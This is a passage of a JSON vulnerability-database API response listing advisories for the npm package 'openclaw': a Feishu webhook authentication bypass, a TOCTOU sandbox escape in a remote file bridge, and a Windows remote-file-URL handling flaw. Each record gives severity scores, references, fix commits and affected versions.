"CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44109" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation" }, { "reference_url": "https://github.com/advisories/GHSA-xh72-v6v9-mwhc", "reference_id": "GHSA-xh72-v6v9-mwhc", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xh72-v6v9-mwhc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api", "purl": "pkg:npm/openclaw@2026.4.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15" } ], "aliases": [ "CVE-2026-44109", "GHSA-xh72-v6v9-mwhc" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xsct-xjs7-nbab" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89722?format=api", "vulnerability_id": "VCID-xvhd-w4tv-tqhr", "summary": "OpenClaw: Sandbox escape via TOCTOU race in remote FS bridge readFile\n## Summary\nSandbox escape via TOCTOU race in remote FS bridge readFile\n\n## Current Maintainer Triage\n- Normalized severity: critical\n- Assessment: v2026.3.28 remote sandbox reads still do path-check then separate file read, so the TOCTOU sandbox escape remains present in the latest shipped tag.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `121870a08583033ed6a0ed73d9ffea32991252bb` — 2026-03-31T09:55:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41296", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10948", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10981", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.1099", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41296" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41296", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41296" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile" }, { "reference_url": "https://github.com/advisories/GHSA-9p3r-hh9g-5cmg", "reference_id": "GHSA-9p3r-hh9g-5cmg", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9p3r-hh9g-5cmg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41296", "GHSA-9p3r-hh9g-5cmg" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xvhd-w4tv-tqhr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91425?format=api", "vulnerability_id": "VCID-xyck-sspa-4ba2", "summary": "OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n## Summary\nWindows local-media handling accepted remote-host file URLs and UNC-style paths before local-path validation, so network-hosted file targets could be treated as local content.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5`\n- `93880717f1cd34feaa45e74e939b7a5256288901`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/local-file-access.ts now rejects remote-host file: URLs and UNC/network paths as non-local input.\n- src/media/web-media.ts, src/media-understanding/attachments.normalize.ts, and src/agents/sandbox-paths.ts all route through the shared local-file guard.\n\nOpenClaw thanks @RacerZ-fighting, @Fushuling for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34426", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.15181", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.15223", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.15233", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34426" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/59182", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/" } ], "url": "https://github.com/openclaw/openclaw/pull/59182" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization" }, { "reference_url": "https://github.com/advisories/GHSA-h3x4-hc5v-v2gm", "reference_id": "GHSA-h3x4-hc5v-v2gm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h3x4-hc5v-v2gm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { 